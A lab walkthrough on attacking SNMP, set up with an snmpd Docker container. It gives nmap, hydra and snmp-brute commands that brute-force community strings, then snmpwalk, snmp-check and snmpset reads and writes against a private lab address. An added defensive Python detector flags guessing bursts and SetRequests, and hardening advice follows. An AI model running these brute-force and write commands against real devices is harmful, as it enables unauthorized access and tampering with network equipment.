[Server:]
For the server side, install an SNMP daemon (snmpd) through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd
[Hacker:]
Confirm that the remote SNMP service is up and responding:
# nmap -sU -sV -n -p 161 192.168.0.253
Check which Nmap scripts could be used to gather further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root 7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root 4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root 5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root 5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root 4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root 4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root 1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root 2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root 2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root 4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root 2003 Mar 10 12:52 snmp-win32-users.nse
Brute-force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253
Try the default community string "public" with snmpwalk:
# snmpwalk -v 2c 192.168.0.253 -c public
Get a clearer picture of the target's configuration with snmp-check:
# snmp-check 192.168.0.253 -c public
Read an OID, then try to modify it (snmpset needs the write community string, here "private"):
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"
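As an added example (not part of the original post and not code from any of the tools it uses), the Python script below shows the defender's side of the brute-force and snmpset steps above. SNMPv1/v2c carry the community string in clear text, so a sensor on UDP/161 can see both a source cycling through many community strings (what snmp-brute and hydra look like on the wire) and any SetRequest, which should only ever come from the management station. The script embeds a small BER encoder so it can construct its own sample datagrams and run offline; every IP address, community string, function name and threshold in it is constructed for the example.

```python
"""Flag SNMP community-string guessing and write attempts in UDP/161 traffic.

Added example: a minimal BER encoder builds constructed SNMPv2c datagrams,
a decoder pulls version, community string and PDU type back out of them,
and a detector raises alerts on guessing bursts and on SetRequest PDUs.
"""
from collections import defaultdict

# ASN.1/BER tags used in SNMP messages
TAG_INTEGER, TAG_OCTET_STRING, TAG_NULL, TAG_OID, TAG_SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "Response",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}
SYS_DESCR = "1.3.6.1.2.1.1.1.0"  # sysDescr.0, the first OID snmpwalk reads


def _tlv(tag, content):
    """Encode one BER tag-length-value triple (short and long length forms)."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        nbytes = (n.bit_length() + 7) // 8
        length = bytes([0x80 | nbytes]) + n.to_bytes(nbytes, "big")
    return bytes([tag]) + length + content


def _integer(value):
    """Minimal two's-complement encoding of a non-negative INTEGER."""
    nbytes = max(1, (value.bit_length() + 8) // 8)  # +8 keeps the sign bit clear
    return _tlv(TAG_INTEGER, value.to_bytes(nbytes, "big"))


def _oid(dotted):
    """Encode a dotted OID: first two arcs merge into one byte, the rest are base-128."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return _tlv(TAG_OID, bytes(out))


def build_snmp_packet(community, pdu_tag=0xA0, oid=SYS_DESCR, request_id=1):
    """Build an SNMPv2c message (constructed sample traffic, not a real capture)."""
    varbind = _tlv(TAG_SEQUENCE, _oid(oid) + _tlv(TAG_NULL, b""))
    pdu = _tlv(pdu_tag, _integer(request_id) + _integer(0) + _integer(0)
               + _tlv(TAG_SEQUENCE, varbind))
    return _tlv(TAG_SEQUENCE, _integer(1) + _tlv(TAG_OCTET_STRING, community.encode()) + pdu)


def _read_tlv(buf, pos=0):
    """Decode one TLV at buf[pos:]; return (tag, content, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_snmp_header(packet):
    """Return (version, community, pdu_name) from an SNMPv1/v2c datagram.

    The community string sits in clear text right after the version field,
    which is why v1/v2c guessing is visible on the wire and why v3 is preferred.
    """
    tag, body, _ = _read_tlv(packet)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an SNMP message")
    tag, ver, pos = _read_tlv(body)
    if tag != TAG_INTEGER:
        raise ValueError("missing version")
    tag, community, pos = _read_tlv(body, pos)
    if tag != TAG_OCTET_STRING:
        raise ValueError("missing community")
    pdu_tag, _, _ = _read_tlv(body, pos)
    return int.from_bytes(ver, "big"), community.decode(errors="replace"), PDU_NAMES.get(pdu_tag, hex(pdu_tag))


def detect_community_guessing(datagrams, window=60.0, threshold=5):
    """datagrams: iterable of (timestamp, src_ip, packet_bytes).

    Alerts when a source tries `threshold` distinct communities within `window`
    seconds (hydra / snmp-brute behaviour) and on every SetRequest, since writes
    should come only from the management station.
    """
    seen = defaultdict(list)  # src_ip -> [(timestamp, community)]
    alerts = []
    for ts, src, packet in datagrams:
        try:
            _version, community, pdu = parse_snmp_header(packet)
        except (ValueError, IndexError):
            continue  # not SNMP v1/v2c (or truncated); ignore
        if pdu == "SetRequest":
            alerts.append((src, "SetRequest", community))
        seen[src] = [(t, c) for t, c in seen[src] if ts - t <= window] + [(ts, community)]
        distinct = {c for _, c in seen[src]}
        if len(distinct) >= threshold:
            alerts.append((src, "community-guessing", len(distinct)))
            seen[src].clear()  # one alert per burst
    return alerts


if __name__ == "__main__":
    # Constructed traffic: a normal poller, a guessing source, then a write attempt.
    sample = [(0.0, "10.0.0.5", build_snmp_packet("public"))]
    sample += [(1.0 + i, "10.0.0.99", build_snmp_packet(c))
               for i, c in enumerate(["public", "private", "test1", "test2", "test3"])]
    sample.append((30.0, "10.0.0.99", build_snmp_packet("private", pdu_tag=0xA3)))
    for alert in detect_community_guessing(sample):
        print(alert)
```

In practice the datagrams would be fed from a capture on UDP/161 rather than constructed; the parser is enough to show that nothing hides the community string in v1/v2c. On the snmpd side the matching fixes are to drop the write community (or bind `rwcommunity` to the management host only) and to move polling to SNMPv3 with authentication and privacy, so neither snmp-brute nor snmpset with a guessed string has anything to hit.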